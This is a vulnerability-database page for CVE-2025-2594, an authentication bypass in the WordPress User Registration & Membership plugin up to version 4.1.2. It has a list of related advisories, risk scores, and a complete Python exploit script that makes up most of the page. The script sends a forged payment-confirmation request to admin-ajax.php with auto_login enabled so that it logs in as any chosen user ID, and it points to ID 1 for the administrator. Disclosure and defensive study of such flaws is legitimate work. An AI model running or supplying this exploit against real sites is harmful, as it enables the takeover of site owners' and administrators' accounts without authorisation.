📄 WordPress User Registration and Membership 4.1.2 Authentication Bypass

🗓️ 26 May 2025 00:00:00Reported by Mohammed Idrees BanyamerType

WordPress User Registration and Membership plugin allows authentication bypass in versions up to 4.1.2.

Reporter	Title	Published	Views	Family All 14
Circl	CVE-2025-2594	2 Apr 202517:00	–	circl
CNNVD	WordPress plugin User Registration & Membership 安全漏洞	22 Apr 202500:00	–	cnnvd
CVE	CVE-2025-2594	22 Apr 202506:00	–	cve
Cvelist	CVE-2025-2594 User Registration & Membership < 4.1.3 - Authentication Bypass	22 Apr 202506:00	–	cvelist
Exploit DB	WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass	25 May 202500:00	–	exploitdb
EUVD	EUVD-2025-12286	3 Oct 202520:07	–	euvd
NVD	CVE-2025-2594	22 Apr 202506:15	–	nvd
Packet Storm	📄 WordPress User Registration and Membership 4.1.2 Authentication Bypass	6 Feb 202600:00	–	packetstorm
Patchstack	WordPress User Registration plugin < 4.1.3 - Authentication Bypass vulnerability	1 Apr 202517:57	–	patchstack
Patchstack	WordPress User Registration & Membership Pro plugin < 5.1.3 - Authentication Bypass vulnerability	1 Apr 202518:05	–	patchstack

#!/usr/bin/env python3
    # Exploit Title: WordPress User Registration & Membership Plugin 4.1.2 - Authentication Bypass
    # Date: 2025-05-22
    # Exploit Author: Mohammed Idrees Banyamer
    # Vendor Homepage: https://wordpress.org/plugins/user-registration/
    # Software Link: https://downloads.wordpress.org/plugin/user-registration.4.1.2.zip
    # Version: <= 4.1.2
    # Tested on: WordPress 6.x, Apache on Linux
    # CVE: CVE-2025-2594
    
    import requests
    import sys
    import argparse
    from urllib.parse import urljoin
    from termcolor import cprint, colored
    
    def banner():
        cprint("┌──────────────────────────────────────────────┐", "cyan")
        cprint("│ WordPress Plugin User Registration <= 4.1.2   │", "cyan")
        cprint("│ Authentication Bypass Exploit (CVE-2025-2594)│", "cyan")
        cprint("│ Author: Mohammed Idrees Banyamer             │", "cyan")
        cprint("└──────────────────────────────────────────────┘", "cyan")
    
    def exploit(target_url, member_id, nonce):
        endpoint = urljoin(target_url, "/wp-admin/admin-ajax.php")
    
        files = {
            'action': (None, 'user_registration_membership_confirm_payment'),
            'security': (None, nonce),
            'form_response': (None, '{"auto_login": true}'),
            'member_id': (None, str(member_id))
        }
    
        cprint(f"[+] Target URL: {endpoint}", "yellow")
        cprint(f"[+] Attempting to bypass authentication as user ID {member_id}...\n", "yellow")
    
        try:
            response = requests.post(endpoint, files=files, timeout=10)
    
            if response.status_code == 200 and '"success":true' in response.text:
                cprint("[✓] Exploit successful! Authentication bypass achieved.", "green")
                cprint("[!] Check your session/cookies - you may now be authenticated as the target user.\n", "green")
                print("Server Response:")
                print(response.text)
            else:
                cprint("[-] Exploit failed or invalid nonce/member_id.", "red")
                print("Server Response:")
                print(response.text)
        except requests.exceptions.RequestException as e:
            cprint(f"[!] Request failed: {e}", "red")
    
    def main():
        banner()
    
        parser = argparse.ArgumentParser(description="CVE-2025-2594 - WordPress Plugin Authentication Bypass")
        parser.add_argument("target", help="Base target URL (e.g., http://localhost)")
        parser.add_argument("member_id", help="Target user ID (usually 1 for admin)")
        parser.add_argument("nonce", help="_confirm_payment_nonce value from registration page")
    
        args = parser.parse_args()
    
        exploit(args.target, args.member_id, args.nonce)
    
    if __name__ == "__main__":
        main()

26 May 2025 00:00Current

7.6High risk

Vulners AI Score7.6

CVSS 3.18.1

EPSS0.28447

SSVC